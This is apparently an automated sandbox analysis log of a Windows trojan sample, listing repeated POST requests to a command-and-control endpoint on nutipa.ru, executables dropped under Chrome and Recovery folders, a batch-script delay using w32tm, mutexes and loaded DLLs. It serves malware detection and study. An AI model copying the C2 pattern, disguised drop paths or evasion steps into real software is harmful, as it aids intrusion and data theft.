                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1392Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1404Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: nutipa.ru
                              Source: unknownHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nutipa.ru
                              Source: 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nutipa.ru/
                              Source: 150bIjWiGH.exe, 00000005.00000002.2924790458.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nutipa.ru/_authGamewordpress.php
                              Source: 150bIjWiGH.exe, 00000000.00000002.1722563578.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BFCBE450_2_00007FFD9BFCBE45
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 0_2_00007FFD9BFC16E00_2_00007FFD9BFC16E0
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9BFDBE455_2_00007FFD9BFDBE45
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeCode function: 5_2_00007FFD9BFD16E05_2_00007FFD9BFD16E0
                              Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\Application\Idle.exe E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                              Source: Joe Sandbox ViewDropped File: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                              Source: Joe Sandbox ViewDropped File: C:\Recovery\KcduafKotlNaKVM.exe E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                              Source: 150bIjWiGH.exe, 00000000.00000000.1675428024.000000000134A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 150bIjWiGH.exe
                              Source: 150bIjWiGH.exe, 00000000.00000002.1747363747.000000001C774000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 150bIjWiGH.exe
                              Source: 150bIjWiGH.exe, 00000000.00000002.1747363747.000000001C774000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 150bIjWiGH.exe
                              Source: 150bIjWiGH.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 150bIjWiGH.exe
                              Source: 150bIjWiGH.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: 150bIjWiGH.exe, DmcWucu9ZjDuseHj6np.csCryptographic APIs: 'CreateDecryptor'
                              Source: 150bIjWiGH.exe, DmcWucu9ZjDuseHj6np.csCryptographic APIs: 'CreateDecryptor'
                              Source: 150bIjWiGH.exe, DmcWucu9ZjDuseHj6np.csCryptographic APIs: 'CreateDecryptor'
                              Source: 150bIjWiGH.exe, DmcWucu9ZjDuseHj6np.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.troj.evad.winEXE@10/64@1/1
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Program Files\Google\Chrome\Application\Idle.exeJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\pekirssD.logJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeMutant created: NULL
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-1PskwlBIP03G3dSi5snm
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\AppData\Local\Temp\GKtkfBoISLJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat"
                              Source: 150bIjWiGH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 150bIjWiGH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 150bIjWiGH.exeReversingLabs: Detection: 71%
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile read: C:\Users\user\Desktop\150bIjWiGH.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\150bIjWiGH.exe "C:\Users\user\Desktop\150bIjWiGH.exe"
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\150bIjWiGH.exe "C:\Users\user\Desktop\150bIjWiGH.exe"
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\150bIjWiGH.exe "C:\Users\user\Desktop\150bIjWiGH.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
